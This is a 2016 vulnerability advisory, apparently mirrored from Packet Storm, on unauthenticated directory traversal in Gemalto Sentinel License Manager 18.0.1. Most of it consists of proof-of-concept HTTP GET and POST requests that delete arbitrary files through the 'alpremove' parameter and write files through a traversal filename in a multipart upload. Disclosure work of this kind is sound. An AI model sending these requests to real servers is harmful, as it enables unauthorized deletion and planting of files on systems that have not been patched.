Gemalto Sentinel License Manager 18.0.1 Directory Traversal

2016-06-16T00:00:00
ID PACKETSTORM:137513
Type packetstorm
Reporter LiquidWorm
Modified 2016-06-16T00:00:00

Description

                                        
                                            `  
Gemalto Sentinel License Manager 18.0.1 Directory Traversal Vulnerability  
  
  
Vendor: Gemalto NV | SafeNet, Inc  
Product web page: http://www.gemalto.com | http://www.safenet-inc.com  
Affected version: 18.0.1.55505  
  
Summary: The Sentinel License Manager enforces and manages licensing  
in multi-user environment. It keeps track of all the licenses and  
handles requests from network users who want to run your application,  
granting authorization to the requesters to allow them to run the  
application, and denying requests when all licenses are in use. It is  
an integral component of the network licensing schemes that can be  
implemented with Sentinel RMS, namely server-locked licenses, site  
licenses and commuter licenses.  
  
Desc: Input passed via the 'alpremove' and 'check_in_file' parameters  
is not properly verified in '/_int_/action.html' and '/_int_/checkin_file.html'  
before being used to delete and create files. This can be exploited to  
arbitrarily delete sensitive information on a system and/or write files  
via directory traversal attacks.  
  
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)  
HASP LM/18.00 (web server)  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5330  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5330.php  
  
  
26.04.2016  
  
--  
  
  
  
1. Unauthenticated file removal using POST or GET:  
--------------------------------------------------  
1st request renames the file to meaning_of_life.txt.bak  
2nd request removes the file entirely from C:\  
--------------------------------------------------------  
  
POST /_int_/action.html HTTP/1.1  
Host: localhost:1947  
  
alpremove=/../../../../../../../meaning_of_life.txt  
  
OR  
  
1st req: GET http://localhost:1947/_int_/action.html?alpremove=/../../../../../../../meaning_of_life.txt HTTP/1.1  
2nd req: GET http://localhost:1947/_int_/action.html?alpremove=/../../../../../../../meaning_of_life.txt HTTP/1.1  
  
  
  
2. Unauthenticated file write:  
------------------------------  
PoC that creates license file in C:\  
-------------------------------------  
  
POST /_int_/checkin_file.html HTTP/1.1  
Host: localhost:1947  
Content-Length: 770  
Cache-Control: max-age=0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Origin: http://localhost:1947  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVlbofFpDmUw9CugB  
Referer: http://localhost:1947/_int_/checkin.html  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.8  
Cookie: hasplmlang=_int_  
Connection: close  
  
------WebKitFormBoundaryVlbofFpDmUw9CugB  
Content-Disposition: form-data; name="check_in_file"; filename="\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\jxzp"  
Content-Type: application/octet-stream  
  
<?xml version="1.0" encoding="UTF-8" ?>  
<location>  
<license_manager id="\..\..\..\..\..\..\..\..\..\..\..\juuzzta" time="0">  
<version>18.0.1.55505</version>  
<hostname>LAB-ZSL</hostname>  
<name>LAB-ZSL</name>  
<host_fingerprint type="SL-AdminMode" crc="1439826437">  
MXhJSWPdmwJr2iAIUgAGKBk/7N4U2GbJjLA6hGC1VHDvrsA2W+8e2ChuAFYgF6ZG  
ttm6N6iupYkEEHzcQQrG1r0pIGBarRkAy0GR46nuTYFtm8iAMA5IBQoP82wKbLMl  
gUKpUABvAmhFimCbrXumJpsOA8ApTjaU12zdm0LkvsgTAPECCFTau  
</host_fingerprint>  
</license_manager>  
</location>  
  
------WebKitFormBoundaryVlbofFpDmUw9CugB--  
  
`